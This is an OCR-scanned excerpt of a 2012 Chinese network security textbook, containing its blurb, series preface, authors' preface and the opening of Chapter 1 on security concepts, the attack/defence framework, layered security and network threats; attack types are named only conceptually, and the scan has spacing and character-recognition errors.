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内 容 简 介 


本 书 系统 全 面 地 介绍 了 网 络 安全 的 基本 概念 、 网 络 安全 体系 结构 及 网 络 信息 安全 的 评价 标准 ,在 对 计 
算 机 网 络 体系 结构 及 协议 进行 简要 介绍 的 基础 上 ,对 网 络 攻击 和 防御 的 理论 和 方法 进行 了 较为 详细 .系统 
的 介绍 ,对 Windows 和 Linux 操作 系统 平台 的 安全 性 设计 和 实现 进行 了 分 析 。 对 信息 加 密 理 论 与 技术 进 
行 了 介绍 ,给 出 了 常用 的 网 络 安全 设备 防火 墙 \, 人 侵 检测 /防御 系统 、 蜜 饶 / 蜜 网 的 工作 原理 和 应 用 领域 。 
书 中 还 给 出 了 网 络 攻防 的 几 个 典型 案例 ,介绍 了 网 络 安全 的 规划 、 设 计 和 评估 方法 。 

本 书 结构 严谨 .层次 分 明 、 概 念 清晰 ,叙述 准确 实践 性 强 , 易 于 学 习 和 理解 ,可 作为 高 等 院 校 计算 机 专 
业 、 电 子 信息 以 及 通信 专业 高 年 级 本 科 生 和 低 年 级 硕士 研究 生 教材 ,也 可 供 网 络 安全 管理 人 员 以 及 开发 人 
员 作 为 技术 参考 书 或 工具 书 使 用 。 
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出 版 说 明 


由 于 网 络 应 用 越 来 越 普及 ,信息 化 的 社会 已 经 呈现 出 越 来 越 广阔 的 前 景 ,可 以 肯定 地 说 ， 
在 未 来 的 社会 中 电子 支付 ,电子 银行 ,电子 政务 以 及 多 方面 的 网 络 信息 服务 将 深入 到 人 
类 生活 的 方方面面 。 同 时 , 随 之 面临 的 信息 安全 问题 也 日 益 突 出 ,非法 访问 、 信 息 窃取 、 
其 至 信息 犯罪 等 恶意 行为 导致 信息 的 严重 不 安全 。 信 息 安全 问题 已 由 原来 的 军事 国防 
领域 扩展 到 了 整个 社会 ,因此 社会 各 界 对 信息 安全 人 才 有 强烈 的 需求 。 

信息 安全 本 科 专 业 是 2000 年 以 来 结合 我 国 特色 开设 的 新 的 本 科 专 业 , 是 计算 机 、 
通信 ,数学 等 领域 的 交叉 学 科 , 主要 研究 确保 信息 安全 的 科学 和 技术 。 自 专业 创办 以 
来 ,各 个 高 校 在 课程 设置 和 教材 研究 上 一 直 处 于 探索 阶段 。 但 各 高 校 由 于 本 身 专业 设 
置 上 来 自 于 不 同 的 学 科 , 如 计算 机 、 通 信和 数学 等 ,在 课程 设置 上 也 没有 统一 的 指导 规 
范 ,在 课程 内 容 \ 深 浅 程度 和 课程 衔接 上 ,存在 模糊 不 清 、 内 容重 释 、 知 识 覆 盖 不 全 面 等 
现象 。 因 此 ,根据 信息 安全 类 专业 知识 体系 所 覆盖 的 知识 点 ,系统 地 研究 目前 信息 安全 
专业 教学 所 涉及 的 核心 技术 的 原理 、 实 践 及 其 应 用 ,合理 规划 信息 安全 专业 的 核心 课 
程 , 在 此 基础 上 提出 适合 我 国信 息 安全 专业 教学 和 人 才 培 养 的 核心 课程 的 内 容 框架 和 
知识 体系 ,并 在 此 基础 上 设计 新 的 教学 模式 和 教学 方法 ,对 进一步 提高 国内 信息 安全 专 
业 的 教学 水 平和 质量 具有 重要 的 意义 。 

为 了 进一步 提高 国内 信息 安全 专业 课程 的 教学 水 平和 质量 ,培养 适应 社会 经 济 发 
展 需要 的 、 兼 具 研究 能 力 和 工程 能 力 的 高 质量 专业 技术 人 才 。 在 教育 部 相关 教学 指导 
委员 会 专家 的 指导 和 建议 下 ,清华 大 学 出 版 社 与 国内 多 所 重点 大 学 共同 对 我 国信 息 安 
全 人 才 培 养 的 课程 框架 和 知识 体系 ,以 及 实践 教学 内 容 进行 了 深入 的 研究 ,并 在 该 基础 
上 形成 了 “信息 安全 人 才 需 求 与 专业 知识 体系 、 课 程 体系 的 研究 ”等 研究 报告 。 

本 系列 教材 是 在 课程 体系 的 研究 基础 上 总 结 、 完 善 而 成 ,力求 充分 体现 科学 性 、 先 
进 性 、 工 程 性 ,突出 专业 核心 课程 的 教材 ,兼顾 具有 专业 教学 特点 的 相关 基础 课程 教材 ， 
探索 具有 发 展 潜力 的 选修 课程 教材 ,满足 高 校 多 层次 教学 的 需要 。 

本 系列 教材 在 规划 过 程 中 体现 了 如 下 一 些 基 本 组 织 原 则 和 特点 。 

(1) 反映 信息 安全 学 科 的 发 展 和 专业 教育 的 改革 ,适应 社会 对 信息 安全 人 才 的 培 
养 需求 ,教材 内 容 坚 持 基本 理论 的 扎实 和 清晰 ,反映 基本 理论 和 原理 的 综合 应 用 ,在 其 
基础 上 强调 工程 实践 环节 ,并 及 时 反映 教学 体系 的 调整 和 教学 内 容 的 更 新 。 

(2) 反映 教学 需要 ,促进 教学 发 展 。 教 材 要 适应 多 样 化 的 教学 需要 ,正确 把 握 教学 
内 容 和 课程 体系 的 改革 方向 ,在 选择 教材 内 容 和 编写 体系 时 注意 体现 素质 教育 、 创 新 能 


I 网 络 安全 教程 及 实践 


力 与 实践 能 力 的 培养 ,为 学 生 知识 能 力 、 素 质 协调 发 展 创造 条 件 。 

(3) 实施 精品 战略 ,突出 重点 。 规 划 教 材 建设 把 重点 放 在 专业 核心 (基础 ) 课 程 的 教材 
建设 上 ; 特别 注意 选择 并 安排 一 部 分 原来 基础 比较 好 的 优秀 教材 或 讲义 修订 再 版 ,逐步 形 
成 精品 教材 ; 提倡 并 鼓励 编写 体现 工程 型 和 应 用 型 的 专业 教学 内 容 和 课程 体系 改革 成 果 的 
教材 。 

(4) 支持 一 纲 多 本 ,合理 配套 。 专 业 核 心 课 和 相关 基础 课 的 教材 要 配套 ,同一 门 课程 可 
以 有 多 本 具有 各 自 内 容 特点 的 教材 。 处 理 好 教材 统一 性 与 多 样 化 ,基本 教材 与 辅助 教材 , 教 
学 参考 书 ,文字 教材 与 软件 教材 的 关系 ,实现 教材 系列 资源 的 配套 。 

(5) 依靠 专家 ,择优 落实 。 在 制定 教材 规划 时 依靠 各 课程 专家 在 调查 研究 本 课程 教材 
建设 现状 的 基础 上 提出 规划 选 题 。 在 落实 主编 人 选 时 ,要 引入 竞争 机 制 , 通 过 申报 .评审 确 
定 主编 。 书 稿 完成 后 认真 实行 审 稿 程序 ,确保 出 书 质量 。 

繁荣 教材 出 版 事业 ,提高 教材 质量 的 关键 是 教师 。 建 立 一 支 高 水 平 的 、 以 老 带 新 的 教材 
编写 队伍 才能 保证 教材 的 编写 质量 ,希望 有 志 于 教材 建设 的 教师 能 够 加 入 到 我 们 的 编写 队 
伍 中 来 。 
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表 二 


网 络 安 全 主要 是 指 保护 网 络 信息 系统 使 其 没有 危险 .不 受 威胁 .不 出 事故 。 从 技术 角度 来 
说 ,网 络 安全 涵盖 面 非常 广 , 不 仅 包 含 威胁 网 络 安全 的 各 种 计算 机 病毒 .木马 、 恶 意 软件 
和 各 种 方式 的 网 络 攻 击 行为 ,还 有 针对 这 些 威胁 的 各 种 安全 技术 、 设 备 、 软 件 和 应 用 配 
置 方 法 以 及 加 密 、 解 密 技术 等 。 总 之 ,网 络 安全 主要 涉及 信息 系统 的 保密 性 ,完整 性 、 真 
实 性 ,可靠 性 、 可 用 性 和 不 可 抵赖 性 等 。 

本 书 在 编写 的 过 程 中 ,主要 依据 网 络 安全 的 目标 ,结合 作者 十 多 年 来 在 各 类 企 事 业 
单位 网 络 安 全 设计 、 规 划 及 技术 实现 方面 的 工作 经 验 , 综 合作 者 在 网 络 安全 课程 多 年 进 
行 研究 生 和 本 科 生 教学 的 经 验 , 既 考虑 到 对 基础 理论 和 知识 的 讲解 ,又 考虑 到 实际 应 用 
的 需要 ,本 着 易学 . 易 掌 握 的 原则 ,由 浅 入 深 、 循 序 渐进 地 介绍 了 网 络 安全 相关 技术 知识 
和 操作 方法 ,注重 学 习 者 理论 水 平和 操作 技能 的 同步 提高 , 既 具 有 专业 性 ,又 不 乏 实 用 
性 ,能 够 很 好 地 满足 网 络 安全 方面 的 教学 需要 。 

本 书 共 分 为 13 章 。 第 1 章 介绍 了 网 络 通信 安全 的 基本 概念 和 评价 标准 ; 第 2 章 
介绍 了 计算 机 网 络 的 基础 知识 ; 第 3 章 介 绍 了 网 络 安 全 的 基础 知识 ; 第 4 一 6 章 介绍 了 
网 络 攻击 和 防御 技术 ; 第 7 章 和 第 8 章 介 绍 了 常见 的 加 密 解密 技术 、 防 火 墙 和 入 侵 检 
测 技术 ; 第 9 一 11 章 介 绍 了 基于 Linux 和 Windows 系统 的 安装 、 配 置 特别 是 安全 设 
置 ; 第 12 童 介绍 了 Web 安全 和 IP 安全 ; 第 13 章 介 绍 了 网 络 安全 规划 、 设 计 和 评估 
方法 。 

参加 本 书 编写 工作 的 主要 有 : 兰州 交通 大 学 的 李 启 南 编 写 了 第 7、 第 9 一 12 章 , 西 
北 民族 大 学 的 郭 晓 然 编写 了 第 3 一 6 章 和 第 8 章 ,其 余 章节 由 兰州 交通 大 学 的 吴 辰 文 编 
写 ,并 进行 了 统 稿 。 

本 书 在 编写 过 程 中 还 得 到 了 许多 师 生 的 帮助 ,特别 是 兰州 交通 大 学 计算 机 科学 与 
技术 系 的 硕士 研究 生 于 芳 . 董 晓 静 王 平王 维 . 关 必 郎 、 吴 立 鹏 、 李 贝 , 张 炊 方 、 石 佳 玉 和 
孔 德 弟 ,为 本 书 的 编写 进行 了 辛勤 的 工作 ,包括 录入 文字 绘制 图 表 、 实 验 平台 的 搭建 和 
编程 实现 等 ,在 此 表示 诚挚 的 谢意 。 

由 于 网 络 安全 技术 发 展 非常 迅速 ,涉及 的 知识 面 广 ,加 之 作者 水 平 有 限 , 书 中 难免 
存在 下 漏 与 不 妥 之 处 ,恳请 读者 批评 指正 。 对 于 本 书 中 存在 的 不 妥 之 处 ,也 请 有 关 专 家 
和 读者 提出 宝贵 意见 。 


编 者 
2012 年 4 月 
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第 1 章 网 络 安全 概论 


本 章 学 习 要 求 : 

。 掌握 网 络 安全 的 基本 要 求 ,了 解 网 络 安全 技术 的 发 展 状况 和 发 展 趋势 。 
。 了解 网 络 安 全 的 攻防 体系 和 层次 体系 结构 。 

。 熟悉 网 络 通信 系统 面临 的 安全 威胁 。 

。 了 解 网 络 安全 在 信息 化 中 的 重要 性 。 

。 熟悉 网 络 安全 的 目标 ,掌握 网 络 安全 的 评价 标准 。 


1.1 网 络 安全 概述 


1.1.1 网 络 安全 的 概念 


随 着 信息 化 进程 的 深入 和 Internet 的 迅速 普及 ,人 们 的 工作 .学 习 和 生活 方式 发 生 了 巨 
大 变化 ,工作 效率 大 幅度 提高 ,信息 资源 得 到 最 大 程度 的 共享 。 但 随 之 而 来 的 是 网 络 上 的 安 
全 问题 越 来 越 突出 ,网 络 信息 系统 遭受 病毒 侵害 乃至 黑客 攻击 的 现象 越 来 越 多 ,因此 ,保证 
网 络 信息 系统 的 安全 成 为 网 络 发 展 中 的 重要 问题 。 据 中 国 互联 网 络 信息 中 心 CCNNIC ) 发 
布 的 (第 24 次 中 国 互 联网 络 发 展 状 况 统计 报告 ?显示 ,在 我 国 , 仅 2011 年 上 半年 就 有 超过 
2.17 亿 的 网 民 上 网 时 遇 到 过 病毒 和 木马 的 攻击 ,其 中 约 1. 21 亿 网 民 遇 到 过 账号 或 密码 被 
次 的 问题 。 因 此 ,网 络 安全 已 经 成 为 当前 各 界 十 分 关注 的 问题 ,网 络 钓鱼 .病毒 .木马 等 网 络 
安全 隐患 的 存在 给 网 络 信息 技术 的 发 展 带 来 了 极 大 的 威胁 ,而 在 我 国 的 网 络 规模 和 应 用 取 
得 快速 发 展 的 基础 上 ,网 络 应 用 已 经 从 生活 娱乐 逐步 向 社会 经 济 领域 渗透 ,网 民 对 网 络 信任 
和 安全 的 要 求 也 日 渐 提 高 。 我 国 互联 网 下 一 步 发 展 的 重点 是 由 可 用 互联 网 向 可 信和 互联 网 阶 
段 发 展 , 如 何 提高 网 民 对 互联 网 的 信任 程度 ,已 经 成 为 当前 迫切 需要 解决 的 问题 ,而 在 “可 
用 ”的 基础 之 上 ,构建 “可 信 ” 的 网 络 环境 则 是 未 来 的 必然 趋势 。 因 此 ,网 络 信息 安 全 技术 成 
为 建设 “可 信和 ”网 络 环境 的 重要 技术 手段 。 

网 络 安 全 是 指 网 络 系统 的 硬件 ,软件 及 其 系统 中 的 数据 受到 保护 ,不 因 偶然 的 或 者 恶意 
的 原因 而 遭 到 破坏 更改. 泄 漏 ,系统 连续 可 靠 正常 地 运行 ,网 络 能 够 提供 不 中 断 服务 。 

网 络 安全 从 其 本 质 上 来 讲 就 是 网 络 上 的 信息 安全 。 从 广义 来 说 ,凡是 涉及 网 络 上 信息 
的 保密 性 .完整 性 .可 用 性 真实 性 和 可 控 性 的 相关 技术 和 理论 都 是 网 络 安全 的 研究 领域 。 

网 络 安全 的 具体 含义 会 随 着 “角度 ”的 变化 而 变化 。 比 如 : 从 用 户 ( 个 人 、 企 业 等 ) 的 角 
度 来 说 ,他 们 和 希望 涉及 个 人 隐私 或 商业 利益 的 信息 在 网 络 上 传输 时 受到 机 密 性 、 完 整 性 和 真 
实 性 的 保护 ,避免 其 他 人 或 对 手 利用 窃听 .冒充 、 算 改 ,抵赖 等 手段 侵犯 用 户 的 利益 和 隐私 。 

从 网 络 运行 和 管理 者 的 角度 ,他们 和 希望 对 本 地 网 络 信息 的 访问 . 读 写 等 操作 受到 保护 和 
控制 ,避免 出 现 *“ 陷 门 ”病毒 .非法 存 取 、 拒 绝 服务 和 网 络 资源 非法 占用 和 非法 控制 等 威胁 ， 
制止 和 防御 网 络 黑客 的 攻击 。 
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对 安全 保密 部 门 来 说 ,他 们 和 希望 对 非法 的 有 害 的 或 涉及 国家 机 密 的 信息 进行 过 滤 和 防 
堵 , 避 免 机 要 信息 泄漏 ,防止 对 社会 产生 危害 .对 国家 造成 巨大 损失 。 

从 社会 教育 和 意识 形态 角度 来 讲 , 网 络 上 不 健康 的 内 容 ,会 对 社会 的 稳定 和 人 类 的 发 展 
造成 阻碍 ,必须 对 其 进行 控制 。 


1.1.2 网 络 安全 的 攻防 体系 


网 络 安全 的 安全 威胁 来 自 于 黑客 的 攻击 ,而 要 保证 网 络 安全 , 则 需要 针对 网 络 安全 进行 
有 效 的 防御 ,因此 ,网 络 安全 从 大 的 方面 可 以 分 为 攻击 技术 和 防御 技术 两 大 类 。 这 两 类 技术 
是 相辅相成 互相 促进 而 发 展 的 。 一 方面 ,黑客 进行 攻击 的 时 候 , 需 要 了 解 各 种 防御 技术 和 方 
法 ,以 便 能 绕 过 防御 而 对 目标 进行 攻击 ; 另 一 方面 ,在 进行 防御 的 时 候 则 必须 了 解 黑客 攻击 
的 方式 方法 ,这 样 才能 有 效 地 应 对 各 种 攻击 。 攻 击 和 防御 永远 是 一 对 矛盾 。 图 1-1 则 用 图 
示 的 方法 说 明了 网 络 安全 攻防 体系 所 涉及 的 内 容 。 


攻击 技术 攻击 类 型 
网 络 扫描 拒绝 服务 型 攻击 | | 包 过 滤 技 术 防火 墙 
网 络 监 听 利用 型 攻击 行为 特征 判断 技术 | 应 用 代理 
网 络 入 侵 信息 收集 型 攻击 | | 加 密 全 IDS/IPS 


网 络 后 门 与 隐身 | 假 消息 型 攻击 


网 络 安全 的 实施 
工具 ; 扫描 类 工具 ， 嗅 探 类 工具 ， 防 火 墙 软 件 ，IDS/1PS 软 件 ， 加 密 /解密 软件 
编程 语言 : C，C++，Perl，Shell 等 


网 络 安全 的 物理 基础 
操作 系统 : Windows NT/2000/2003/2008，Linux，UNIX 
网 络 协 议 : TCPIP 协 议 答 各 种 相关 协议 ， 其 他 相关 的 通信 协议 


图 1-1 网 络 安全 的 攻防 体系 结构 


攻击 技术 可 以 分 为 4 大 类 ,具体 如 下 。 

第 一 类 是 服务 拒绝 类 攻击 ,包括 死亡 之 ping(ping of death) 、 泪 滴 (Teardrop)、UDP 洪 
水 (UDP flood) ,SYN 洪水 (SYN flood) 、Land 攻击 、Smurf 攻击 、Fraggle 攻击 、 电 子 邮 件 炸 
弹 和 畸形 消息 攻击 等 。 

第 二 类 是 利用 型 攻击 ,包括 口令 猜测 ,特洛伊 木马 \ 缓 冲 区 溢出 。 

第 三 类 是 信息 收集 型 攻击 ,包括 地 址 扫描 、 端 口 扫描 、 反 向 映射 , 慢 速 扫描 、 体 系 结构 探 
测 .DNS 域 转换 、Finger 服务 .LDAP 服务 等 。 

第 四 类 是 假 消息 攻击 ,主要 包括 DNS 高 速 缓存 污染 .伪造 电子 邮件 。 

网 络 系统 的 防御 技术 主要 包括 以 下 几 种 技术 。 

(1) 包 过 滤 技 术 。 也 是 防火 墙 最 基本 的 技术 。 包 过 滤 技 术 是 用 来 控制 内 、 外 网 络 数据 
流入 和 流出 ,通过 对 数据 流 的 每 个 包 进 行 检查 ,根据 数据 报 的 源 地 址 、 目 的 地 址 、TCP 和 
UDP 的 端口 号 ,以 及 TCP 的 其 他 状态 来 确定 是 否 允许 数据 包 通 过 。 

(2) 行为 特征 判断 技术 。 属 于 比 包 过 滤 技 术 更 可 靠 更 精确 的 攻击 判断 技术 ,通过 对 攻 
击 者 一 系列 攻击 数据 包 行为 规律 的 分 析 、 归 纳 、 总 结 .并 结合 专家 的 经 验 , 提 人 炼 出 攻击 识别 规 
则 知识 库 ; 模拟 专家 发 现 新 攻击 的 机 理 ,通过 分 布 在 用 户 计 算 机 系统 上 的 各 种 探 针 ,动态 监 
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视 程 序 运行 的 动作 ,并 将 程序 的 一 系列 操作 通过 逻辑 关系 分 析 组 成 有 意义 的 行为 ,再 结合 应 
用 攻击 识别 规则 知识 ,实现 对 攻击 的 自动 识别 。 

(3) 加 密 技 术 。 是 最 常用 的 安全 保密 手段 ,利用 技术 手段 (加 密 算法 ) 把 重要 的 数据 变 
为 乱码 (加 密 ) 传 送 , 到 达 目 的 地 后 再 用 相同 或 不 同 的 手段 还 原 (解密 ) 为 原文 。 

(4) OS 安全 配置 技术 。 通 过 采用 安全 的 操作 系统 ,并 对 操作 系统 进行 各 种 安全 配置 ， 
以 保证 合法 访问 者 能 够 进行 操作 和 访问 ,隔离 和 阻 断 非法 访问 者 的 请 求 。 

应 用 以 上 技术 所 采用 的 防御 手段 (或 设备 ) 通 常 有 以 下 几 种 。 

(1) 防火 墙 。 一 个 由 软件 、 硬 件 或 者 是 二 者 结合 组 合 而 成 .在 内 部 网 和 外 部 网 之 间 、 专 
用 网 与 公共 网 之 间 的 界面 上 放置 的 安全 设备 ,通过 监测 、 限 制 . 更 改 跨越 防火 墙 的 数据 流 , 尽 
可 能 地 对 外 部 屏蔽 网 络 内 部 的 信息 、 结 构 和 运行 状况 ,以 此 来 实现 对 网 络 的 安全 保护 。 

(2) 应 用 代理 。 是 彻底 隔断 通信 两 端的 直接 通信 的 网 络 安全 设备 ,安装 了 应 用 代理 后 ， 
所 有 通信 都 必须 经 应 用 层 代理 转发 ,访问 者 任何 时 候 都 不 能 与 服务 器 建立 直接 的 连接 ,应 用 
层 的 协议 会 话 过 程 必须 符合 代理 的 安全 策略 要 求 ,而 将 不 符合 安全 要 求 的 各 种 连接 阻 断 或 
屏蔽 ,保护 网 络 的 安全 。 

(3) IDS/IPS( 入 侵 检测 系统 /入 侵 防 御 系 统 )。 依 照 一 定 的 安全 策略 ,对 网 络 、 系 统 的 运 
行 状况 进行 监视 , 尽 可 能 发 现 各 种 攻击 企图 、 攻 击 行为 或 者 攻击 结果 ,以 保证 网 络 系统 资源 
的 机 密 性 、 完 整 性 和 可 用 性 。 

(4) 安全 网 阅 。 是 使 用 带 有 多 种 控制 功能 的 固态 开关 读 写 介 质 连 接 两 个 独立 主机 系统 
的 信息 安全 设备 。 物 理 隔 离 网 闸 所 连接 的 两 个 独立 主机 系统 之 间 ,不 存在 通信 的 物理 连接 、 
逻辑 连接 、 信 息 传输 命令 .信息 传输 协议 ,不 存在 依据 协议 的 信息 包 转 发 ,只 有 数据 文件 的 无 
协议 “摆渡 ”, 且 对 固态 存储 介质 只 有 “* 读 ”和 * 写 ”两 个 命令 。 所 以 ,物理 隔离 网 阅 从 物理 上 隔 
离 . 阻 断 了 具有 潜在 攻击 可 能 的 一 切 连接 ,使 黑客 "无 法 入 侵 无 法 攻击 .无 法 破坏 ,提高 了 
受 保 护 网 络 的 安全 性 。 

上 面 所 列 的 技术 是 网 络 安全 攻击 防御 体系 中 经 常用 到 的 技术 ,除了 上 述 所 列 的 技术 以 
外 ,网 络 安全 管理 技术 .身份 认证 与 访问 控制 技术 病毒 及 恶意 软件 防护 技术 .Web 站 点 安 
全 技术 ,数据库 系统 安全 技术 以 及 电子 商务 安全 技术 等 也 是 网 络 安全 技术 所 涉及 的 内 容 。 

网 络 安全 的 实施 过 程 中 需要 各 种 类 型 的 工具 ,包括 扫描 类 工具 、 嗅 探 类 工具 、 防 火 墙 
软件 .IDSV/IPS 软件 、 加 密 / 解 密 软件 等 。 而 编写 这 些 工具 采用 的 编程 语言 主要 有 C、C++、 
Perl、Shell 等 。 

对 于 任何 系统 ,网 络 的 安全 是 根本 ,因此 网 络 安全 的 物理 基础 也 是 网 络 安全 的 根本 ,网 
络 安全 的 物理 基础 包括 安全 的 操作 系统 ,如 Windows NT/2000/2003/2008、Linux、UNIX 
等 ; 也 包括 各 种 网 络 协议 ,通常 使 用 的 是 TCP/IP 协议 簇 各 种 相关 协议 和 其 他 相关 的 通信 
协议 。 
1.1.3 ”网络 安全 的 层次 体系 


从 层次 体系 上 ,可 以 将 网 络 安 全 划分 为 物理 层 安全 、 系 统 层 安全 、 网 络 层 安全 、 应 用 层 安 
全 和 安全 管理 5 个 层次 ,各 个 层次 的 安全 性 问题 主要 如 下 。 

1. 物理 环境 的 安全 性 (物理 层 安全 ) 

网 络 环境 的 安全 包括 通信 线路 的 安全 、 物 理 设备 的 安全 、 机 房 的 安全 等 。 该 层次 的 安全 
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分 为 主动 安全 和 被 动 安全 ,主动 安全 主要 提高 网 络 系统 本 身 的 安全 性 和 可 靠 性 ,防止 因 系统 
运行 部 件 老 化 .设计 缺陷 造成 的 危害 ,被动 安全 主要 防止 各 种 自然 灾害 和 人 为 的 破坏 。 

主动 安全 包括 通信 线路 的 可 靠 性 (线路 备份 、 网 管 软件 、 传 输 介质 ) , 软 硬 件 设备 安全 性 
(替换 设备 .拆卸 设备 .增加 设备 ) ,设备 的 备份 , 抗 干扰 能 力 , 设 备 的 运行 环境 (温度 .湿度 、 烟 
侍 ) ,不 间断 电源 保障 等 。 

被 动 安全 包括 : 网 络 设备 和 通信 线路 的 防火 、 防 盗 、 防 自然 灾害 、 防 静电 、 防 雷击 和 电磁 

2. 操作 系统 的 安全 性 (系统 层 安 全 ) 

该 层次 的 安全 问题 来 自 网 络 内 使 用 的 操作 系统 的 安全 ,因为 操作 系统 是 计算 机 中 最 基 
本 、 最 重要 的 软件 ,这 些 软件 支撑 着 其 他 应 用 软件 的 运行 。 常 见 的 网 络 操作 系统 如 
Windows NT、Windows 2000、Windows 2003、Windows 2008、Linux 、 UNIX 等 ,这 些 操作 系 
统 本 身 具 有 较 高 的 安全 性 。 操 作 系统 的 安全 性 主要 表现 在 三 个 方面 ,一 是 操作 系统 本 身 的 
缺陷 带 来 的 不 安全 因素 ,主要 包括 身份 认证 ,访问 控制 、 系 统 漏洞 等 ; 二 是 对 操作 系统 的 安 
全 配置 问题 ; 三 是 攻击 或 者 病毒 对 操作 系统 的 威胁 。 

3. 网 络 的 安全 性 (网 络 层 安全 ) 

该 层次 的 安全 问题 主要 体现 在 网 络 方面 的 安全 性 ,包括 网 络 层 身份 认证 ,网 络 资源 的 访 
问 控制 ,数据 传输 的 保密 与 完整 性 ,远程 接 入 的 安全 ,域名 系统 的 安全 ,路 由 系统 的 安全 ,入 
侵 检测 的 手段 ,网 络 设施 防 病毒 等 。 

4. 应 用 的 安全 性 (应 用 层 安全 ) 

该 层次 的 安全 问题 主要 由 提供 服务 所 采用 的 应 用 软件 和 数据 的 安全 性 产生 ,包括 Web 
服务 .电子 邮件 系统 .DNS 等 。 此 外 ,也 包括 病毒 对 系统 的 威胁 。 

5. 管理 的 安全 性 (管理 层 安 全 ) 

管理 的 安全 性 包括 网 络 运行 的 基本 安全 管理 与 资源 和 访问 的 逻辑 安全 管理 。 基 本 安全 
管理 包括 安全 技术 和 设备 的 管理 .安全 管理 制度 .部 门 与 人 员 的 组 织 规则 等 。 管 理 的 制度 化 
极 大 程度 地 影响 着 整个 网 络 的 安全 ,严格 的 安全 管理 制度 .明确 的 部 门 安全 职责 划分 、 合 理 
的 人 员 角 色 配 置 都 可 以 在 很 大 程度 上 降低 其 他 层次 的 安全 漏洞 。 

资源 和 访问 的 逻辑 安全 管理 包括 如 何 限制 资源 只 被 合法 的 用 户 访问 、 如 何 管理 各 种 口 
令 、 是 否 需 要 限制 登录 次 数 和 登录 时 间 、 登 录 的 用 户 具 有 哪些 操作 权限 等 。 

总 之 ,网 络 信 息 系统 的 安全 性 是 一 个 复杂 的 问题 ,在 具体 的 实践 中 ,只 能 具体 问题 具体 
分 析 , 和 寻找 出 有 针对 性 的 方法 ,进行 全 方位 的 综合 防御 。 


1.2 计算 机 网 络 面临 的 安全 威胁 


计算 机 网 络 自从 得 到 广泛 应 用 后 ,人 们 对 网 络 的 依赖 性 越 来 越 强 ,面临 的 安全 问题 越 来 
越 多 ,网 络 安全 所 影响 的 范围 也 越 来 越 大 ,造成 的 后 果 越 来 越 严 重 。 

计算 机 网 络 是 一 个 多 种 类 型 的 计算 机 设备 、 多 种 协议 、 多 系统 、 多 应 用 、 多 用 户 组 成 的 分 
布 范围 很 广 的 系统 ,其 复杂 性 高 ,因此 不 可 避免 地 存在 着 各 种 各 样 的 安全 隐患 和 漏洞 。 据 
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Security Focus 公司 的 漏洞 统计 数据 显示 , 绝 大 部 分 操作 系统 存在 着 安全 漏洞 。 由 于 管理 、 
软件 工程 难度 等 问题 ,新 的 隐患 和 漏洞 不 断 地 被 引入 到 网 络 环境 中 ,所 有 这 些 安全 脆弱 点 都 
可 能 成 为 攻击 者 攻击 的 切入 点 ,攻击 者 可 以 利用 这 些 脆 弱点 人 侵 系 统 ,窃取 信息 。 

计算 机 网 络 所 面临 的 威胁 大 体 可 分 为 两 种 : 一 是 对 网 络 中 信息 的 威胁 ; 二 是 对 网 络 中 
设备 的 威胁 。 影 响 计算 机 网 络 的 因素 很 多 ,有 些 因素 可 能 是 有 意 的 ,也 可 能 是 无 意 的 ; 可 能 
是 人 为 的 ,也 可 能 是 非 人 为 的 ; 从 威胁 的 主体 来 看 ,可 能 是 外 来 黑客 对 网 络 系统 资源 的 非法 
使 用 ,也 可 能 是 内 部 人 员 的 破坏 和 信息 的 偷窃 ,还 可 能 是 商业 竞争 对 手 商 业 竞争 的 需要 ,或 
者 是 新 闻 机 构 为 了 搜集 新 闻 信息 。 

归结 起 来 ,针对 网 络 安全 的 威胁 主要 有 以 下 几 种 。 

(1) 人 为 的 无 意 失误 。 如 网 络 安全 管理 不 规范 造成 的 安全 级 别 低 ,操作 员 安 全 配置 不 
当 造 成 的 安全 漏洞 ,用 户 安全 意识 不 强 , 用 户口 令 选择 不 慎 , 用 户 将 自己 的 账号 随意 转借 他 
人 或 与 别人 共享 等 都 会 对 网 络 安全 带 来 威胁 。 

(2) 人 为 的 恶意 攻击 。 这 是 计算 机 网 络 所 面临 的 最 大 威胁 ,敌手 的 攻击 和 计算 机 犯罪 
就 属于 这 一 类 。 网 络 攻击 手段 越 来 越 隐蔽 、 攻 击 技术 越 来 越 先 进 、 攻 击 范 围 越 来 越 广 .攻击 
工具 随处 可 得 、 攻 击 实施 简单 易 行 ,这 些 都 为 防范 网 络 攻击 带 来 了 巨大 的 挑战 。 人 为 的 恶意 
攻击 分 为 以 下 两 种 : 一 种 是 主动 攻击 , 它 以 各 种 方式 有 选择 地 破坏 信息 的 有 效 性 和 完整 性 ; 
另 一 类 是 被 动 攻击 , 它 是 在 不 影响 网 络 正 常 工作 的 情况 下 ,进行 截获 窃取、 破译 以 获得 重要 
机 密 信息 。 这 两 种 攻击 均 可 对 计算 机 网 络 造成 极 大 的 危害 ,并 导致 机 密 数据 的 泄漏 。 攻 击 
的 方式 可 以 是 病毒 .代码 炸弹 或 者 是 特洛伊 木马 等 。 

(3) 网 络 软 件 的 漏洞 和 “后 门 ”。 网 络 软件 不 可 能 是 百分之百 无 缺陷 和 无 漏洞 的 ,然而 ， 
这 些 漏洞 和 缺陷 恰恰 是 黑客 进行 攻击 的 首选 目标 ,曾经 出 现 过 的 黑客 攻 入 网 络 内 部 的 事件 ， 
这 些 事 件 大 部 分 就 是 因为 安全 措施 不 完善 所 导致 的 。 另 外 ,软件 的 “后 门 ? 都 是 软件 公司 的 
设计 编程 人 员 为 了 自己 的 方便 而 设置 的 ,一 般 不 为 外 人 所 知 , 但 一 旦 “后 门 2 打开, 其 造成 的 
后 果 将 不 堪 设 想 。 

(4) 网 络 传输 线 缆 连 接 威 胁 。 包 括 搭 接 、 窃 听 、 拨 号 进入 万 至 破坏 线 缆 导 致 连接 中 断 , 在 
局 域 网 中 ,由 于 信息 插座 均 安 装 在 建筑 物 内 的 墙壁 上 ,如 果 没 有 安全 限制 或 监控 ,攻击 者 很 可 
能 就 会 通过 信息 插座 连 入 网 络 , 从 而 成 为 局 域 网 内 用 户 ,非常 容易 地 窃取 网 络 中 的 各 种 信息 。 

除了 上 述 威胁 以 外 ,还 包括 身份 鉴别 威胁 和 各 种 物理 威胁 。 身 份 鉴别 威胁 表现 在 攻击 
者 会 冒充 合法 的 用 户 , 通 过 各 种 方式 获得 合法 用 户 的 口令 ,来 进入 网 络 系 统 ,实施 攻击 ; 各 
种 物理 威胁 则 来 自 于 偷窃 (包括 偷窃 设备 , 偷 窍 信息 或 者 偷窃 服务 等 ) .废物 搜寻 (从 一 些 废 
弃 的 打印 材料 或 磁盘 中 搜寻 有 用 的 信息 ) 和 间谍 行为 。 

